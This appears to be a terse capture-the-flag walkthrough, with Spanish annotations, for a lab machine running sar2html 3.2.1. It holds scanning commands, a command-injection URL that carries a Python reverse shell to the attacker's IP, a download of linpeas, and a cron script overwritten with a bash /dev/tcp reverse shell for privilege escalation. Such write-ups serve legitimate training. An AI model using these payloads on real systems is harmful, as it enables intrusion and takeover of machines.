nmap -A -p- -oA sar 192.168.152.35 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA sar 192.168.152.35

nmap -sU -O -p- -oA sar-udp 192.168.152.35

nikto -h 192.168.152.35:80

Pasted image 20210816133925.png

nmap -sCV -p80,443 192.168.152.35 -oN targeted

Pasted image 20210915174250.png

Pasted image 20210915174430.png

whatweb http://192.168.152.35

Pasted image 20210915174510.png

http://192.168.152.35

Pasted image 20210915174654.png

http://192.168.152.35/root.txt

Pasted image 20210915174634.png

searchsploit sar2html 3.2.1

Pasted image 20210915175132.png

http://192.168.152.35/sar2HTML/index.php?plot=;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.152",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Vamos a esta direccion de arriba

nc -lvnp 443

python3 -m http.server 80

cd /tmp

wget http://192.168.49.152/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

Pasted image 20210915181121.png

Vemos que se corre un script llamado write.sh

![[Pasted image 20210915181500.png]]

Borramos el archivo write.sh y creamos uno nuevo.

Pasted image 20210915181839.png

#!/bin/bash
bash -i >& /dev/tcp/192.168.49.52/443 0>&1

Hacemos un nuevo script

python3 -m http.server 8888

wget http://192.168.49.152:8888/write.sh

Pasted image 20210915182702.png

chmod 777 write.sh

Pasted image 20210915183552.png

nc -lvnp 443

Pasted image 20210915183626.png

boxes

copyright©2022 Cu3rv0x all rights reserved